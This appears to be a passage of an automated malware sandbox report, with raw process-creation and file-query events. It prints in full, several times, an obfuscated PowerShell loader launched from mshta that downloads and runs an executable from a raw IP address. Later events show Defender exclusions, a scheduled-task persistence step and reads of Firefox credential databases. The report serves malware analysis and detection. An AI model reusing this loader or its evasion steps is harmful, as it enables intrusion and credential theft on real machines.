                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeQueries volume information: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
